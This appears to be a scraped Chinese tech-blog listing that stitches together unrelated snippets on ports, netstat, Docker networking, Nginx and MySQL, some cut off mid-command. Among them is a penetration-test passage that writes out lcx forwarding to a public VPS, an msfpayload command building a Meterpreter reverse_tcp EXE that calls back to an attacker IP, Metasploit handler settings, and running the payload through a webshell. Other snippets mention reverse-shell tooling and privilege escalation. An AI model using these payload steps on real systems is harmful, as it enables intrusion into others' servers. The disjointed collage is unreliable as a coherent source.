在服务器的日常使用中,有时候会遇到某些端口被占用的情况发生,那么怎么查看端口被占用了呢?
开发有时候需要连接远程调试端口调试环境,上一个开发用完没有主动断开,下一个开发再用也用不了,如果等待系统主动断开,默认的话可能需要等 2 小时。 netstat -a | grep 端口号 命令可以查看连接当前端口的 ip 和对应的端口号。
默认情况下Linux的1024以下端口是只有root用户才有权限占用,我们的tomcat,apache,nginx等等程序如果想要用普通用户来占用80端口的话就会抛出java.net.BindException: Permission denied:80的异常。 bind时perror提示错误信息:permission denied 解决办法有两种: 1.使用非80端口启动程序,然后再用iptables做一个端口转发。 iptables -t nat -A PREROUTING -p tcp -
VirtualBox下载地址 https://www.virtualbox.org/
adb连手机的时候经常会出现offline的情况,一般杀掉adb,然后重启adb可以解决。 如果发现不管怎么重启adb都连不上,一直出现offlie的情况,这个时候很大可能就是adb的5037端口被其它应用占了
英语渣渣的我百度了一下,应该是要用journalctl -xe命令查询系统日志的意思
Fiddler,一个抓包神器,不仅可以通过手机访问APP抓取接口甚至一些数据,还可以抓取微信授权网页的代码。
无论是否将 nohup 命令的输出重定向到终端,输出都将附加到当前目录的 nohup.out 文件中。
ShellPop是一款针对Shell的管理工具,在该工具的帮助下,广大研究人员不仅可以轻松生成各种复杂的反向Shell或Bind Shell,而且还可以在渗透测试过程中实现Shell的“花式”弹出,这将极大程度地简化大家的渗透测试任务。
最近在做一个功能的时候碰到一个问题,就是这个功能要对接硬件(智能眼镜),这个设备在用手机调试的时候遇到了问题,因为这个眼镜是要用usb线和手机连接的,不是无线的,那么调试程序的时候就无法再用usb模式调试了,这样开发就有问题了,无法打断点调试等。然后就用到了我们今天要讲的 无线调试 方法。
作为测试人员,有时候进入一个新的环境,部分公司可能已经存在比较完善的测试环境,我们入职即可使用。但是有的公司在测试数据,测试环境方面可能还是空白,需要我们自己动手部署。
Target address:http://www.vulnhub.com/entry/hacknos-os-hacknos,401/
通常我们都是在进行跟网络相关的问题排查时会需要查看服务器上的网络及端口的连接情况,本文就通过最常用的netstat命令来介绍网络连接情况的查看和监控。下面我们以循序渐进的方式来对几个不同的场景进行介绍。
最近在帮一位大师傅测试招新赛的时候,发现自己对反弹shell是不太了解的,因此在用反弹shell解题过后,来对反弹shell进行相关学习,希望对各位师傅有所帮助。
通过gtfobins:https://gtfobins.github.io/ 来查看对应的提权方法
1、关闭所有的 INPUT FORWARD OUTPUT 只对某些端口开放。 下面是命令实现:
用nmap -sV扫描靶机后,发现开放了31337端口,而且还是python开启的SimpleHttp
0x02 reverse_tcp实战应用过程 (1) 前期测试 试了些已公布的2008提权EXP,不过都失败了,第三方软件也只找到一个Filezilla Server。先把C:\Program Files (x86)\FileZilla Server文件夹打包到我们本地,然后再用lcx把Filezilla Server的14147端口转发出来,lcx执行命令如下。 首先VPS机器监听51端口,连接用14147端口: VPS机器执行: C:\>lcx.exe -listen 51 14147 目标机器执行: /c C:\aspSmartUpload\lcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx转发了FileZilla Server的14147端口后还是连接不上,返回右上图这样的报错,Google翻译报错信息得知:协议错误:未通过身份验证,关闭连接,连接到服务器关闭。使用netstat -ano命令查看当前网络连接状态如下。 TCP 9*.1*9.4.1*3:139 0.0.0.0:0 LISTENING 4 TCP 9*.1*9.4.1*3:54133 1*3.2*1.*7.1*8:51 ESTABLISHED 2028 TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 1040 TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING 1088 TCP 127.0.0.1:14147 127.0.0.1:49160 ESTABLISHED 1088 TCP 127.0.0.1:49160 127.0.0.1:14147 ESTABLISHED 5736 可以看到我们已经与目标机器建立了一个完整TCP连接,而且我们本地机器也成功的返回了数据,但是好像返回的数据信息中有错误,如下图。 当前问题: 不能正常把目标服务器的FileZilla Server 14147端口给转发出来,返回数据中出错了,所以无法在本地连接上FileZilla Server服务端。 解决办法: 利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件,然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用 如果我们自己也处于内网环境的情况下,那么就需要先在路由器里进行端口映射配置,然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件,命令如下。 root@devil:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=1*3.2*1.*7.1*8 LPORT=12345 X > /media/sf_系统学习/test.exe 先把我们生成好的test.exe载荷文件上传至目标机器的可读/写目录下,然后进入到MSF完成所有必填的配置选项,执行命令如下。 use exploit/mutil/handler //加载监听模块 set PAYLOADY windows/x64/meterpreter/reverse_tcp //设置攻击载荷 set LHOST 192.168.1.4 //设置攻击者内网IP set LPORT 12345 //设置本地监听端口 exploit //exploit执行监听 将必填配置选项完成后执行exploit命令进行监听,然后在WebShell执行C:\aspSmartUpload\test.exe载荷文件,如果成功的话就会返回一个reverse_tcp反向连接的会话。 成功得到目标机器Meterpreter会话,然后直接使用portfwd命令进行端口转发即可,执行命令如下。 meterpreter > portfwd add -l 14147 -p 14147 -r 127.0.0.1 使用portfwd命令成功执行端口转发操作后,我们再来连接目标机器的FileZilla Server服务端看下是否能正常连接
在容器首次启动是,可通过-p参数(-P参数则会随机选择宿主机的一个端口进行映射)来指定宿主机和容器端口的映射,例如:
B 系列 SAN 交换机 – Zoning 配置 信息型 本文档提供了 Brocade SAN 交换机 zoning 配置的分步骤指南。 详细信息
最近写了一个微服务项目,本地调试很麻烦,每次修改一部分都得把代码提交到仓库,再用Jenkins编译。整个流程感觉有点慢,想着改完代码执行一个脚本,直接编译并且将jar包发布到测试环境上。幸运的是win10已经支持ssh和scp命令了,所以我可以用scp命令来实现我的想法了,无图无真相
Nick McKeown,斯坦福大学教授、博士生导师,美国国家工程院院士,美国艺术与科学学院、英国皇家工程院院士、开放网络实验室(Open Networking Lab)创始人之一,Clean Slate项目主任,曾获得英国计算机学会Lovelace Medal奖,IEEE Kobayashi计算机与通讯奖,ACM Sigcomm终身成就奖和IEEE Rice通讯理论奖,同时还有ETH荣誉博士学位。一大长串各种在学术界和研究界的头衔,令人目不暇接。
下载地址: 链接: https://pan.baidu.com/s/1pqV2Olqe1zyPfdy-E8bagA 提取码: vx28
在前一篇的基础上,现在对服务器进行环境搭建,其实就是安装你需要的软件,配置环境变量,然后安装tomcat。
1、在服务器的安全组和防火墙中放通相对应的端口,操作系统:centos 7.6,需要放通9000端口
docker安装时会自动创建三个网络,我们可以用docker network ls指令查看:
尽管很多公司已经都使用k8s方便管理了各种容器应用,但作为一个容器管理者,需要了解其中网络如何运作,前面已经介绍了K8s中的网络,这里就来研究下docker容器中的网络配置。
Date/time:2016年,这次遇到的问题有些奇葩,这里简单记录下测试过程。已经拿到目标主机最高权限,但是在转发3389端口时遇到了问题。
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Traverxec”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
本人是个Java工程师,在家里撸代码时台式机、笔记本、虚拟机都可能用来编译构建maven项目,此时如果家里有个maven私服,对构建速度的提升效果是明显的;
这次的内容是DC系列的第五个靶机,不得不说这个系列每一个靶机都很有代表性,闲话少叙,搞起来。
实验环境使用之前用过的GNS3、WireShark和CRT 进入GNS3页面,点击左侧图标菜单栏,拖入2台路由器到拓扑操作台,再点击PC图标,选择VPC,拖入拓扑操作台,配置两台路由器(更改名称、更改图标、添加二层业务单板、添加磁盘容量为128Mb)
目前越来越多的服务器被入侵,以及攻击事件频频的发生,像数据被窃取,数据库被篡改,用户数据被脱裤,网站被强制跳转到恶意网站上,网站在百度的快照被劫持,等等的攻击症状层出不穷,当我们的服务器被攻击,被黑的时候我们第一时间该怎么去处理解决呢?
参数: LOGSTASH_HOST=192.168.1.115 logstash的ip地址 LOGSTASH_PORT=5044 logstash 端口 SHIPPER_NAME=$(hostname) 不知道何用这样写死
涉及知识内容:FTP未授权、Leetspeak语法、Hash-identifier识别、CMS漏洞利用、hash值破解、破解hash内网提权
发现并没有异常的IP,这倒是不奇怪,假如真的被登录了,登录日志被删除的可能性也是很大的。
PS : none 和host的网络基本也讲解完成了,他们各有利弊,其实用到最多的还是bridage,了解他们的之间的区别。
4、查看有多少个php-fpm执行 ps -fe |grep "php-fpm"|grep "pool"|wc -l
telnet命令用于登录远程主机,对远程主机进行管理。telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。但仍然有很多别的系统可能采用了telnet方式来提供远程登录,因此弄清楚telnet客户端的使用方式仍是很有必要的。
随着 Nginx 越来越流行,Nginx 的版本迭代也越来越频繁,当我们需要使用某些新版本的特性或者修复某个旧版本的 BUG 时,就要对 Nginx 进行升级。然而线上业务大多是 7*24 小时不间断运行的,我们需要在升级的时候保证不影响在线用户的访问。Nginx 的热升级功能可以解决上述问题,它允许新老版本灰度地平滑过渡,这受益于 Nginx 的多进程架构。
声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
在主机下,进入/mydata/mysql/conf/文件夹下,vi my.cnf 文件,输入如下信息,再保存退出 my.cnf
但是仍然有使用windowsu作为服务器的同学和情况。所以我在此整理了一期如何把django平台从mac上移动到windows上的笔记。
按照https://blog.csdn.net/h996666/article/details/80917268安装完MySQL之后。
在主从复制模式的集群里,主节点一般是一个,从节点一般是两个或多个,写入主节点的数据会被复制到从节点上,这样一旦主节点出现故障,应用系统能切换到从节点去读写数据,这样能提升系统的可用性。而且如果再采用主从复制模式里默认的读写分离的机制,更能提升系统的缓存读写性能。所以对性能和实时性不高的系统而言,主从复制模式足以满足一般的性能和安全性方面的需求。
领取专属 10元无门槛券
手把手带您无忧上云